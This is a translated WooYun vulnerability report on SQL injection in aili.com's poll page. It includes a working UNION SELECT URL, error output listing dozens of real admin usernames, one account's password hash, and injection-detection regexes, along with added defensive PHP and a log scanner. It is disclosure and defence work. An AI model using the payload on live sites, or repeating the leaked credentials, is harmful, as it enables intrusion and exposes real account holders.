
Vulnerability summary

Defect ID: wooyun-2013-025661

Title: aili.com has an injection point; the database can be dumped...

Vendor: aili.com

Author: 逆雪寒

Submitted: 2013-06-11 19:23

Fix deadline: 2013-06-16 19:24

Public disclosure: 2013-06-16 19:24

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 20

Status: vendor was notified but ignored the vulnerability

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2013-06-11: details sent to the vendor, awaiting the vendor's handling
2013-06-16: the vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

There is an injection point; the newcms database can be dumped...

Detailed description:

I was browsing and came across this poll: http://plus.aili.com/vote/vote_end.php?vid=31. Out of habit I appended a single quote ', and sure enough it errored:
System Maintenance......
Please wait Try.Invalid SQL: select * from new_vote_main where id = 31\'
: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
on line
System Maintenance......
Please wait Try.Invalid SQL: select * from new_vote_problem where vid = 31\'
: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
on line
The single quote is escaped (note the 31\' in the error), but that is useless here: the parameter is numeric and is placed in the query unquoted, so escaping quotes achieves nothing.
Manual extraction begins:
http://plus.aili.com/vote/vote_end.php?vid=31%20UNION%20ALL%20SELECT%20username,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20from%20admin%20--
For one of the accounts extracted, I tried a rainbow-table lookup and noticed a problem:
Account:
leejin
Password:
650ff33b2875af2f34a2b576dee83947
A password like this looks complex but is actually a simple combination and is still easy to crack. I recommend digits + letters + unusual characters (or uppercase letters) to be safe.
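The root cause in the description above is that an integer parameter reaches the SQL string unquoted, so quote-escaping (addslashes / magic_quotes, which produced the 31\' in the error) cannot help. The following PHP is an added example written for this page, not aili.com's code: it reconstructs the assumed vulnerable pattern next to a hardened handler that enforces the integer type, binds the value with a prepared statement, and stops echoing the failing SQL text to the client (the error pages above disclosed the full query). Only the table name new_vote_main and the parameter name vid come from the report; the PDO handle, function names and the sample inputs are assumptions.

```php
<?php
// Added example (not the original aili.com code). Hypothetical helper names.

// --- Assumed vulnerable pattern: quote-escaping does nothing for an unquoted
// numeric context, so "31 UNION ALL SELECT ..." passes straight through.
function vulnerable_query_text(string $vid): string {
    $escaped = addslashes($vid);                 // only neutralises ' " \ and NUL
    return "select * from new_vote_main where id = $escaped";
}

// --- Hardening step 1: enforce the integer type before the value goes anywhere near SQL.
function validate_vote_id(string $raw): ?int {
    // FILTER_VALIDATE_INT rejects anything that is not a plain integer literal,
    // including "31'" and "31 UNION ALL SELECT ...".
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// --- Hardening step 2: prepared statement; the value is bound, never interpolated.
function fetch_vote_main(PDO $db, int $vid): ?array {
    $stmt = $db->prepare('SELECT * FROM new_vote_main WHERE id = :id');
    $stmt->bindValue(':id', $vid, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// --- Hardening step 3: generic message to the client, full detail only in the server log.
function handle_vote_end(PDO $db, array $get): string {
    $vid = validate_vote_id((string) ($get['vid'] ?? ''));
    if ($vid === null) {
        http_response_code(400);
        return 'Bad request';
    }
    try {
        $row = fetch_vote_main($db, $vid);
    } catch (PDOException $e) {
        error_log('vote_end: ' . $e->getMessage());   // never echoed to the browser
        http_response_code(500);
        return 'Service temporarily unavailable';
    }
    return $row === null ? 'No such vote' : json_encode($row, JSON_UNESCAPED_UNICODE);
}

// Demonstration of the validation step with constructed inputs (no database needed).
// $db = new PDO('mysql:host=DB_HOST_PLACEHOLDER;dbname=DB_NAME_PLACEHOLDER', 'USER', 'PASS');
foreach (['31', "31'", '31 UNION ALL SELECT ...'] as $input) {
    $verdict = validate_vote_id($input) === null ? 'rejected' : 'accepted';
    printf("%-28s -> %s\n", $input, $verdict);
    // vulnerable_query_text($input) would still embed the last two inputs verbatim.
}
```

The type check alone would have closed this particular hole, but the prepared statement is what makes the query safe regardless of how the parameter is later reused; keeping both is the usual practice. Turning off query echoing matters separately: the report's extraction worked through the error page, so display_errors should be off in production and the detail should go to the server log only.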

Proof of vulnerability:

System Maintenance......
Please wait Try.Invalid SQL: select * from new_vote_main where id = 31 UNION ALL SELECT username,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL from admin --
: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
on line
System Maintenance......
Please wait Try.Invalid SQL: select * from new_vote_option where pid = 48
: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
on line
System Maintenance......
Please wait Try.Invalid SQL: select * from new_vote_option where pid =
: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
on line
System Maintenance......
Please wait Try.Invalid SQL: select * from new_vote_option where pid = admin
: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
on line
System Maintenance......
Please wait Try.Invalid SQL: select * from new_vote_option where pid = Aidewei
: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
on line
System Maintenance......
Please wait Try.Invalid SQL: select * from new_vote_option where pid = chenming
: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
on line
System Maintenance......
Please wait Try.Invalid SQL: select * from new_vote_option where pid = dingge
: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
on line
System Maintenance......
Please wait Try.Invalid SQL: select * from new_vote_option where pid = jackzxrl
: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
on line
System Maintenance......
Please wait Try.Invalid SQL: select * from new_vote_option where pid = leejin
: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
on line
System Maintenance......
Please wait Try.Invalid SQL: select * from new_vote_option where pid = seo
: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
on line
System Maintenance......
Please wait Try.Invalid SQL: select * from new_vote_option where pid = test
: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
on line
System Maintenance......
Please wait Try.Invalid SQL: select * from new_vote_option where pid = test-李杰鹏
: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
on line
System Maintenance......
Please wait Try.Invalid SQL: select * from new_vote_option where pid = wangfeng
: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
on line
System Maintenance......
Please wait Try.Invalid SQL: select * from new_vote_option where pid = wang晨
: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
on line
System Maintenance......
Please wait Try.Invalid SQL: select * from new_vote_option where pid = yongbao
: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
on line
System Maintenance......
Please wait Try.Invalid SQL: select * from new_vote_option where pid = yongbaolin
: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
on line
System Maintenance......
Please wait Try.Invalid SQL: select * from new_vote_option where pid = zhangwen
: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
on line
System Maintenance......
Please wait Try.Invalid SQL: select * from new_vote_option where pid = zhaoyang
: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
on line
System Maintenance......
Please wait Try.Invalid SQL: select * from new_vote_option where pid = zxmr
: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
on line
System Maintenance......
Please wait Try.Invalid SQL: select * from new_vote_option where pid = 爱德威
: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
on line
System Maintenance......
Please wait Try.Invalid SQL: select * from new_vote_option where pid = 白晓萌
: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
on line
System Maintenance......
Please wait Try.Invalid SQL: select * from new_vote_option where pid = 边鑫
: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
on line
System Maintenance......
Please wait Try.Invalid SQL: select * from new_vote_option where pid = 蔡嘉铭
: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
on line
System Maintenance......
Please wait Try.Invalid SQL: select * from new_vote_option where pid = 蔡利
: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
on line
System Maintenance......
Please wait Try.Invalid SQL: select * from new_vote_option where pid = 蔡寅寅
: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
on line
System Maintenance......
Please wait Try.Invalid SQL: select * from new_vote_option where pid = 曹灿
: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
on line
System Maintenance......
Please wait Try.Invalid SQL: select * from new_vote_option where pid = 曹翠翠
: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
on line
System Maintenance......
Please wait Try.Invalid SQL: select * from new_vote_option where pid = 曹崴
: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
on line
System Maintenance......
Please wait Try.Invalid SQL: select * from new_vote_option where pid = 测试用户
: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
on line
System Maintenance......
Please wait Try.Invalid SQL: select * from new_vote_option where pid = 岑月
: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
on line
System Maintenance......

Fix recommendation:

I had a look at aili.com as a vendor... vulnerabilities keep coming, injections keep coming. It seems development and operations have no good approach and can only plug holes one at a time (when will it end?). So let me offer you a plan. Since it is PHP, not mixed with other languages, it is still manageable.
1. Blocking SQL injection
Search Baidu: 360.cn published a PHP anti-SQL-injection script. Bring it over to check GPC (GET/POST/COOKIE). Partial code:
// Filter regexes from the 360 script (quoted as-is; the long lines were wrapped in the original)
$getfilter="'|(and|or)\\b.+?(>|<|=|in|like)|\\/\\*.+?\\*\\/|<\\s*script\\b|\\bEXEC\\b|UNION.+?SELECT|UPDATE.+?SET|INSERT\\s+INTO.+?VALUES|(SELECT|DELETE).+?FROM|(CREATE|ALTER|DROP|TRUNCATE)\\s+(TABLE|DATABASE)";
$postfilter="\\b(and|or)\\b.{1,6}?(=|>|<|\\bin\\b|\\blike\\b)|\\/\\*.+?\\*\\/|<\\s*script\\b|\\bEXEC\\b|UNION.+?SELECT|UPDATE.+?SET|INSERT\\s+INTO.+?VALUES|(SELECT|DELETE).+?FROM|(CREATE|ALTER|DROP|TRUNCATE)\\s+(TABLE|DATABASE)";
$cookiefilter="\\b(and|or)\\b.{1,6}?(=|>|<|\\bin\\b|\\blike\\b)|\\/\\*.+?\\*\\/|<\\s*script\\b|\\bEXEC\\b|UNION.+?SELECT|UPDATE.+?SET|INSERT\\s+INTO.+?VALUES|(SELECT|DELETE).+?FROM|(CREATE|ALTER|DROP|TRUNCATE)\\s+(TABLE|DATABASE)";
// Every GET, POST and COOKIE value is run through StopAttack with the matching regex
foreach ($_GET as $key=>$value) {
    StopAttack($key, $value, $getfilter);
}
foreach ($_POST as $key=>$value) {
    StopAttack($key, $value, $postfilter);
}
foreach ($_COOKIE as $key=>$value) {
    StopAttack($key, $value, $cookiefilter);
}
Download the script, place it outside the web directory, then edit php.ini:
auto_prepend_file = 360_safe3.php
Note: it may conflict with the filtering and escaping code you already have, so adjust it as needed. Once this is done, every PHP file on the server is protected automatically; no more plugging holes one by one. Even the code in the remotest corners is covered, and ops and dev can sleep soundly.
The only downside is that server load will rise by 30% to 60%, but for user data and security it is worth it.
2. Disabling the "one-line trojans" (webshells) already present
There are probably quite a few one-line trojans on the server by now; I have seen white hats upload webshells and connect with Caidao (China Chopper). Caidao executes PHP by sending base64-encoded PHP in a POST request (I captured the traffic myself), so even after adding the 360 safety script from step 1 it will not stop webshells that already exist. We need a way to disable them. If a POST or GET value contains the base64_decode function, 99% of the time it is Caidao making the request. So do this: in the StopAttack function of the 360 script from step 1, modify the code and add one line:
preg_match("/base64_decode/is",$StrFiltValue) && exit('_stop attack');
Partial code:
function StopAttack($StrFiltKey, $StrFiltValue, $ArrFiltReq) {
    global $attack_360_log;
    if (is_array($StrFiltValue)) {
        $StrFiltValue = implode($StrFiltValue);
    }
    // Line added by the report's author: treat base64_decode in any request value as a Caidao/webshell request
    preg_match("/base64_decode/is", $StrFiltValue) && exit('_stop attack');
    if (preg_match("/".$ArrFiltReq."/is", $StrFiltValue) == 1) {
        // The excerpt in the report ends here; the remainder (log the hit, then abort) is an assumed completion
        error_log(date('Y-m-d H:i:s') . " $StrFiltKey=$StrFiltValue\n", 3, $attack_360_log);
        exit('_stop attack');
    }
}
Test results:

[Screenshot 1.jpg: test results of the modified filter]
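The keyword filter proposed above blocks requests as they arrive; a defender also wants to know, after the fact, which requests already matched this report's pattern. The following PHP is an added example written for this page, not part of the report or of the 360 script it cites. It parses a few constructed access-log lines (Apache combined-style format, documentation IP addresses) and flags the two GET-side indicators seen in the report: a non-integer value, a quote, or UNION ... SELECT in a parameter that must be an integer. The per-script allowlist of integer parameters is an assumption; only the path /vote/vote_end.php and the parameter vid come from the report. POST bodies, where the base64_decode traffic the report describes would be, never appear in an access log, so that indicator has to be checked in the application, as the report's prepend filter does.

```php
<?php
// Added example (not from the report): scan an access log for the report's GET-side indicators.

// Parameters that must be plain integers, per script path (assumed allowlist).
const INT_PARAMS = [
    '/vote/vote_end.php' => ['vid'],
];

// Constructed log lines; 203.0.113.0/24 and 198.51.100.0/24 are documentation ranges.
const SAMPLE_LOG = <<<'LOG'
203.0.113.5 - - [11/Jun/2013:19:10:01 +0800] "GET /vote/vote_end.php?vid=31 HTTP/1.1" 200 4213
203.0.113.5 - - [11/Jun/2013:19:10:09 +0800] "GET /vote/vote_end.php?vid=31%27 HTTP/1.1" 200 812
203.0.113.5 - - [11/Jun/2013:19:11:30 +0800] "GET /vote/vote_end.php?vid=31%20UNION%20ALL%20SELECT%20username,NULL%20from%20admin%20-- HTTP/1.1" 200 2033
198.51.100.7 - - [11/Jun/2013:19:12:02 +0800] "GET /vote/vote_end.php?vid=32 HTTP/1.1" 200 4190
LOG;

/** Parse one combined-format line into its parts, or return null if it does not match. */
function parse_log_line(string $line): ?array {
    $re = '/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)/';
    if (!preg_match($re, $line, $m)) {
        return null;
    }
    $url = parse_url($m[4]);
    parse_str($url['query'] ?? '', $params);   // parse_str percent-decodes the values
    return [
        'ip'     => $m[1],
        'time'   => $m[2],
        'method' => $m[3],
        'path'   => $url['path'] ?? '',
        'params' => $params,
        'status' => (int) $m[5],
    ];
}

/** Return the indicator names that fire for one parsed request (empty array = clean). */
function indicators(array $req): array {
    $hits = [];
    foreach (INT_PARAMS[$req['path']] ?? [] as $name) {
        if (!isset($req['params'][$name])) {
            continue;
        }
        if (is_array($req['params'][$name])) {       // vid[]=... is never legitimate here
            $hits[] = "array_$name";
            continue;
        }
        $value = (string) $req['params'][$name];
        if (filter_var($value, FILTER_VALIDATE_INT) === false) {
            $hits[] = "non_integer_$name";
        }
        if (preg_match('/\bunion\b.+?\bselect\b/is', $value)) {
            $hits[] = 'union_select';
        }
        if (strpbrk($value, "'\"") !== false) {
            $hits[] = 'quote_probe';
        }
    }
    return $hits;
}

/** Scan a whole log text; returns one alert row per flagged request. */
function scan_log(string $log): array {
    $alerts = [];
    foreach (preg_split('/\R/', trim($log)) as $line) {
        $req = parse_log_line($line);
        if ($req === null) {
            continue;
        }
        $hits = indicators($req);
        if ($hits) {
            $alerts[] = [
                'ip'         => $req['ip'],
                'time'       => $req['time'],
                'path'       => $req['path'],
                'indicators' => $hits,
            ];
        }
    }
    return $alerts;
}

foreach (scan_log(SAMPLE_LOG) as $a) {
    printf("%s %s %s %s\n", $a['time'], $a['ip'], $a['path'], implode(',', $a['indicators']));
}
```

Checking against the expected type of each parameter is what gives the scan its precision: the second and third sample lines are flagged because vid is not an integer, with the quote and UNION checks only adding detail, while the two legitimate requests produce no alert. The same type check is also the cheapest way to harden the script itself, which is why a keyword blacklist such as the one in step 1 should be treated as a stopgap rather than the fix.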


...I do not want to see aili.com injected again......

Copyright notice: when reproducing, credit the source as 逆雪寒@乌云 (WooYun)


Vendor response

Vendor response:

Severity: no impact; vendor ignored

Ignored at: 2013-06-16 19:24

Vendor reply:

Latest status:

None yet